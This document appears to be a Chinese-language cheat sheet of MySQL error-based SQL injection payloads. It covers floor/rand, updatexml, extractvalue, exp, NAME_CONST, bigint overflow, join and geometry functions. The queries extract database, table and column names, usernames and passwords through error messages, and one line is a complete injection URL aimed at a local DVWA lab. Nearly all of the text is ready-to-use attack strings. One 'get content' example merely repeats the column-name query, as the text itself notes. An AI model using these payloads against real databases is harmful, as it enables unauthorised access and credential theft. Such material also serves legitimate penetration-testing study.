MySQL 注入：MySQL 报错注入（含 join 报错）

常见报错函数

1. floor()

获取数据库

mysql> select count(*),(concat( 0x3a,database(), 0x3a,floor(rand()*2))) name from information_schema.tables group by name;

获取表名

mysql> select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;

获取字段名

mysql> select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;

获取内容

mysql> select count(*),concat(0x3a,0x3a,(select username from users limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;

2. UpdateXml()

获取表名

mysql> select updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 3,1)),0);

获取字段

mysql> select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 4,1)),0);

获取内容（注：下方示例与上一条“获取字段”完全相同，仍然只是查列名，此处并未给出取内容的示例）

mysql> select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 4,1)),0);

3. exp()

and exp(~(select * from (select user() ) a) );

得到表名

select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));

得到列名

select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));

检索数据

select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));

一蹴而就

exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))

http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit#

4. extractvalue() （有长度限制，单次报错最多回显 32 个字符）

获取表名

mysql> select extractvalue(1, concat(0x5c,(select table_name from information_schema.tables where table_schema=database() limit 3,1)));

获取字段

mysql> select extractvalue(1, concat(0x5c,(select password from users limit 1,1)));

5. NAME_CONST()

`and+1=(select+*+from+(select+NAME_CONST(PAYLOAD,1),NAME_CONST(PAYLOAD,1))+as+x)`

6. bigint()

select !(select * from (select user())x) -(ps:这是减号) ~0

// 利用 BIGINT 超出范围报错；~0 是对 0 逐位取反，结果是一个很大的数；该方式适用于 MySQL 5.5.5 及以上版本

可以参考 bigint 溢出文章：http://www.cnblogs.com/lcamry/articles/5509112.html

7. join()

`select * from(select * from mysql.user a join mysql.user b using(Host))c;`（用于爆列名很有效）

8. geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

9. multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

10. polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

11. multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

12. linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

13. multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
